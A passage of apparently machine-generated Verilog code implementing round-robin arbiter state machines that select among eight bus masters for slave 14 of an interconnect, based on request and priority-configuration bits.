                        s14_msel_arb0_next_state = s14_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s14_msel_arb0_req[6] ) 
                        begin
                            s14_msel_arb0_next_state = s14_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s14_msel_arb0_req[7] ) 
                            begin
                                s14_msel_arb0_next_state = s14_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s14_msel_arb0_req[0] ) 
                                begin
                                    s14_msel_arb0_next_state = s14_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb0_req[1] ) 
                                    begin
                                        s14_msel_arb0_next_state = s14_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb0_req[2] ) 
                                        begin
                                            s14_msel_arb0_next_state = s14_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb0_grant4:
        begin
            if (  !( s14_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s14_msel_arb0_req[5] ) 
                begin
                    s14_msel_arb0_next_state = s14_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s14_msel_arb0_req[6] ) 
                    begin
                        s14_msel_arb0_next_state = s14_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s14_msel_arb0_req[7] ) 
                        begin
                            s14_msel_arb0_next_state = s14_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s14_msel_arb0_req[0] ) 
                            begin
                                s14_msel_arb0_next_state = s14_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s14_msel_arb0_req[1] ) 
                                begin
                                    s14_msel_arb0_next_state = s14_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb0_req[2] ) 
                                    begin
                                        s14_msel_arb0_next_state = s14_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb0_req[3] ) 
                                        begin
                                            s14_msel_arb0_next_state = s14_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb0_grant5:
        begin
            if (  !( s14_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s14_msel_arb0_req[6] ) 
                begin
                    s14_msel_arb0_next_state = s14_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s14_msel_arb0_req[7] ) 
                    begin
                        s14_msel_arb0_next_state = s14_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s14_msel_arb0_req[0] ) 
                        begin
                            s14_msel_arb0_next_state = s14_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s14_msel_arb0_req[1] ) 
                            begin
                                s14_msel_arb0_next_state = s14_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s14_msel_arb0_req[2] ) 
                                begin
                                    s14_msel_arb0_next_state = s14_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb0_req[3] ) 
                                    begin
                                        s14_msel_arb0_next_state = s14_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb0_req[4] ) 
                                        begin
                                            s14_msel_arb0_next_state = s14_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb0_grant6:
        begin
            if (  !( s14_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s14_msel_arb0_req[7] ) 
                begin
                    s14_msel_arb0_next_state = s14_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s14_msel_arb0_req[0] ) 
                    begin
                        s14_msel_arb0_next_state = s14_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s14_msel_arb0_req[1] ) 
                        begin
                            s14_msel_arb0_next_state = s14_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s14_msel_arb0_req[2] ) 
                            begin
                                s14_msel_arb0_next_state = s14_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s14_msel_arb0_req[3] ) 
                                begin
                                    s14_msel_arb0_next_state = s14_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb0_req[4] ) 
                                    begin
                                        s14_msel_arb0_next_state = s14_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb0_req[5] ) 
                                        begin
                                            s14_msel_arb0_next_state = s14_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb0_grant7:
        begin
            if (  !( s14_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s14_msel_arb0_req[0] ) 
                begin
                    s14_msel_arb0_next_state = s14_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s14_msel_arb0_req[1] ) 
                    begin
                        s14_msel_arb0_next_state = s14_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s14_msel_arb0_req[2] ) 
                        begin
                            s14_msel_arb0_next_state = s14_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s14_msel_arb0_req[3] ) 
                            begin
                                s14_msel_arb0_next_state = s14_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s14_msel_arb0_req[4] ) 
                                begin
                                    s14_msel_arb0_next_state = s14_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb0_req[5] ) 
                                    begin
                                        s14_msel_arb0_next_state = s14_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb0_req[6] ) 
                                        begin
                                            s14_msel_arb0_next_state = s14_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s14_msel_arb1_req = { ( s14_msel_req[7] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'd1 ) ), ( s14_msel_req[6] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'd1 ) ), ( s14_msel_req[5] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'd1 ) ), ( s14_msel_req[4] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'd1 ) ), ( s14_msel_req[3] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'd1 ) ), ( s14_msel_req[2] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[5] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[4] ) ) } == 2'd1 ) ), ( s14_msel_req[1] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[3] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[2] ) ) } == 2'd1 ) ), ( s14_msel_req[0] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[1] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s14_msel_arb1_state <= s14_msel_arb1_grant0;
        end
        else
        begin 
            s14_msel_arb1_state <= s14_msel_arb1_next_state;
        end
    end
    always @ (  s14_msel_arb1_state or  { ( s14_msel_req[7] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'd1 ) ), ( s14_msel_req[6] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'd1 ) ), ( s14_msel_req[5] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'd1 ) ), ( s14_msel_req[4] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'd1 ) ), ( s14_msel_req[3] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'd1 ) ), ( s14_msel_req[2] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[5] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[4] ) ) } == 2'd1 ) ), ( s14_msel_req[1] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[3] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[2] ) ) } == 2'd1 ) ), ( s14_msel_req[0] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[1] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s14_msel_arb1_next_state = s14_msel_arb1_state;
        case ( s14_msel_arb1_state ) 
        s14_msel_arb1_grant0:
        begin
            if (  !( s14_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s14_msel_arb1_req[1] ) 
                begin
                    s14_msel_arb1_next_state = s14_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s14_msel_arb1_req[2] ) 
                    begin
                        s14_msel_arb1_next_state = s14_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s14_msel_arb1_req[3] ) 
                        begin
                            s14_msel_arb1_next_state = s14_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s14_msel_arb1_req[4] ) 
                            begin
                                s14_msel_arb1_next_state = s14_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s14_msel_arb1_req[5] ) 
                                begin
                                    s14_msel_arb1_next_state = s14_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb1_req[6] ) 
                                    begin
                                        s14_msel_arb1_next_state = s14_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb1_req[7] ) 
                                        begin
                                            s14_msel_arb1_next_state = s14_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb1_grant1:
        begin
            if (  !( s14_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s14_msel_arb1_req[2] ) 
                begin
                    s14_msel_arb1_next_state = s14_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s14_msel_arb1_req[3] ) 
                    begin
                        s14_msel_arb1_next_state = s14_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s14_msel_arb1_req[4] ) 
                        begin
                            s14_msel_arb1_next_state = s14_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s14_msel_arb1_req[5] ) 
                            begin
                                s14_msel_arb1_next_state = s14_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s14_msel_arb1_req[6] ) 
                                begin
                                    s14_msel_arb1_next_state = s14_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb1_req[7] ) 
                                    begin
                                        s14_msel_arb1_next_state = s14_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb1_req[0] ) 
                                        begin
                                            s14_msel_arb1_next_state = s14_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb1_grant2:
        begin
            if (  !( s14_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s14_msel_arb1_req[3] ) 
                begin
                    s14_msel_arb1_next_state = s14_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s14_msel_arb1_req[4] ) 
                    begin
                        s14_msel_arb1_next_state = s14_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s14_msel_arb1_req[5] ) 
                        begin
                            s14_msel_arb1_next_state = s14_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s14_msel_arb1_req[6] ) 
                            begin
                                s14_msel_arb1_next_state = s14_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s14_msel_arb1_req[7] ) 
                                begin
                                    s14_msel_arb1_next_state = s14_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb1_req[0] ) 
                                    begin
                                        s14_msel_arb1_next_state = s14_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb1_req[1] ) 
                                        begin
                                            s14_msel_arb1_next_state = s14_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb1_grant3:
        begin
            if (  !( s14_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s14_msel_arb1_req[4] ) 
                begin
                    s14_msel_arb1_next_state = s14_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s14_msel_arb1_req[5] ) 
                    begin
                        s14_msel_arb1_next_state = s14_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s14_msel_arb1_req[6] ) 
                        begin
                            s14_msel_arb1_next_state = s14_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s14_msel_arb1_req[7] ) 
                            begin
                                s14_msel_arb1_next_state = s14_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s14_msel_arb1_req[0] ) 
                                begin
                                    s14_msel_arb1_next_state = s14_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb1_req[1] ) 
                                    begin
                                        s14_msel_arb1_next_state = s14_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb1_req[2] ) 
                                        begin
                                            s14_msel_arb1_next_state = s14_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb1_grant4:
        begin
            if (  !( s14_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s14_msel_arb1_req[5] ) 
                begin
                    s14_msel_arb1_next_state = s14_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s14_msel_arb1_req[6] ) 
                    begin
                        s14_msel_arb1_next_state = s14_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s14_msel_arb1_req[7] ) 
                        begin
                            s14_msel_arb1_next_state = s14_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s14_msel_arb1_req[0] ) 
                            begin
                                s14_msel_arb1_next_state = s14_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s14_msel_arb1_req[1] ) 
                                begin
                                    s14_msel_arb1_next_state = s14_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb1_req[2] ) 
                                    begin
                                        s14_msel_arb1_next_state = s14_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb1_req[3] ) 
                                        begin
                                            s14_msel_arb1_next_state = s14_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb1_grant5:
        begin
            if (  !( s14_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s14_msel_arb1_req[6] ) 
                begin
                    s14_msel_arb1_next_state = s14_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s14_msel_arb1_req[7] ) 
                    begin
                        s14_msel_arb1_next_state = s14_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s14_msel_arb1_req[0] ) 
                        begin
                            s14_msel_arb1_next_state = s14_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s14_msel_arb1_req[1] ) 
                            begin
                                s14_msel_arb1_next_state = s14_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s14_msel_arb1_req[2] ) 
                                begin
                                    s14_msel_arb1_next_state = s14_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb1_req[3] ) 
                                    begin
                                        s14_msel_arb1_next_state = s14_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb1_req[4] ) 
                                        begin
                                            s14_msel_arb1_next_state = s14_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb1_grant6:
        begin
            if (  !( s14_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s14_msel_arb1_req[7] ) 
                begin
                    s14_msel_arb1_next_state = s14_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s14_msel_arb1_req[0] ) 
                    begin
                        s14_msel_arb1_next_state = s14_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s14_msel_arb1_req[1] ) 
                        begin
                            s14_msel_arb1_next_state = s14_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s14_msel_arb1_req[2] ) 
                            begin
                                s14_msel_arb1_next_state = s14_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s14_msel_arb1_req[3] ) 
                                begin
                                    s14_msel_arb1_next_state = s14_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb1_req[4] ) 
                                    begin
                                        s14_msel_arb1_next_state = s14_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb1_req[5] ) 
                                        begin
                                            s14_msel_arb1_next_state = s14_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb1_grant7:
        begin
            if (  !( s14_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s14_msel_arb1_req[0] ) 
                begin
                    s14_msel_arb1_next_state = s14_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s14_msel_arb1_req[1] ) 
                    begin
                        s14_msel_arb1_next_state = s14_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s14_msel_arb1_req[2] ) 
                        begin
                            s14_msel_arb1_next_state = s14_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s14_msel_arb1_req[3] ) 
                            begin
                                s14_msel_arb1_next_state = s14_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s14_msel_arb1_req[4] ) 
                                begin
                                    s14_msel_arb1_next_state = s14_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb1_req[5] ) 
                                    begin
                                        s14_msel_arb1_next_state = s14_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb1_req[6] ) 
                                        begin
                                            s14_msel_arb1_next_state = s14_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s14_msel_arb2_req = { ( s14_msel_req[7] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'd2 ) ), ( s14_msel_req[6] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'd2 ) ), ( s14_msel_req[5] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'd2 ) ), ( s14_msel_req[4] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'd2 ) ), ( s14_msel_req[3] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'd2 ) ), ( s14_msel_req[2] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[5] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[4] ) ) } == 2'd2 ) ), ( s14_msel_req[1] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[3] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[2] ) ) } == 2'd2 ) ), ( s14_msel_req[0] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[1] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s14_msel_arb2_state <= s14_msel_arb2_grant0;
        end
        else
        begin 
            s14_msel_arb2_state <= s14_msel_arb2_next_state;
        end
    end
    always @ (  s14_msel_arb2_state or  { ( s14_msel_req[7] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'd2 ) ), ( s14_msel_req[6] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'd2 ) ), ( s14_msel_req[5] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'd2 ) ), ( s14_msel_req[4] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'd2 ) ), ( s14_msel_req[3] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'd2 ) ), ( s14_msel_req[2] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[5] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[4] ) ) } == 2'd2 ) ), ( s14_msel_req[1] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[3] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[2] ) ) } == 2'd2 ) ), ( s14_msel_req[0] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[1] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s14_msel_arb2_next_state = s14_msel_arb2_state;
        case ( s14_msel_arb2_state ) 
        s14_msel_arb2_grant0:
        begin
            if (  !( s14_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s14_msel_arb2_req[1] ) 
                begin
                    s14_msel_arb2_next_state = s14_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s14_msel_arb2_req[2] ) 
                    begin
                        s14_msel_arb2_next_state = s14_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s14_msel_arb2_req[3] ) 
                        begin
                            s14_msel_arb2_next_state = s14_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s14_msel_arb2_req[4] ) 
                            begin
                                s14_msel_arb2_next_state = s14_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s14_msel_arb2_req[5] ) 
                                begin
                                    s14_msel_arb2_next_state = s14_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb2_req[6] ) 
                                    begin
                                        s14_msel_arb2_next_state = s14_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb2_req[7] ) 
                                        begin
                                            s14_msel_arb2_next_state = s14_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb2_grant1:
        begin
            if (  !( s14_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s14_msel_arb2_req[2] ) 
                begin
                    s14_msel_arb2_next_state = s14_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s14_msel_arb2_req[3] ) 
                    begin
                        s14_msel_arb2_next_state = s14_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s14_msel_arb2_req[4] ) 
                        begin
                            s14_msel_arb2_next_state = s14_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s14_msel_arb2_req[5] ) 
                            begin
                                s14_msel_arb2_next_state = s14_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s14_msel_arb2_req[6] ) 
                                begin
                                    s14_msel_arb2_next_state = s14_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb2_req[7] ) 
                                    begin
                                        s14_msel_arb2_next_state = s14_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb2_req[0] ) 
                                        begin
                                            s14_msel_arb2_next_state = s14_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb2_grant2:
        begin
            if (  !( s14_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s14_msel_arb2_req[3] ) 
                begin
                    s14_msel_arb2_next_state = s14_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s14_msel_arb2_req[4] ) 
                    begin
                        s14_msel_arb2_next_state = s14_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s14_msel_arb2_req[5] ) 
                        begin
                            s14_msel_arb2_next_state = s14_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s14_msel_arb2_req[6] ) 
                            begin
                                s14_msel_arb2_next_state = s14_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s14_msel_arb2_req[7] ) 
                                begin
                                    s14_msel_arb2_next_state = s14_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb2_req[0] ) 
                                    begin
                                        s14_msel_arb2_next_state = s14_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb2_req[1] ) 
                                        begin
                                            s14_msel_arb2_next_state = s14_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb2_grant3:
        begin
            if (  !( s14_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s14_msel_arb2_req[4] ) 
                begin
                    s14_msel_arb2_next_state = s14_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s14_msel_arb2_req[5] ) 
                    begin
                        s14_msel_arb2_next_state = s14_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s14_msel_arb2_req[6] ) 
                        begin
                            s14_msel_arb2_next_state = s14_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s14_msel_arb2_req[7] ) 
                            begin
                                s14_msel_arb2_next_state = s14_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s14_msel_arb2_req[0] ) 
                                begin
                                    s14_msel_arb2_next_state = s14_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb2_req[1] ) 
                                    begin
                                        s14_msel_arb2_next_state = s14_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb2_req[2] ) 
                                        begin
                                            s14_msel_arb2_next_state = s14_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb2_grant4:
        begin
            if (  !( s14_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s14_msel_arb2_req[5] ) 
                begin
                    s14_msel_arb2_next_state = s14_msel_arb2_grant5;
                end
                else
                begin 
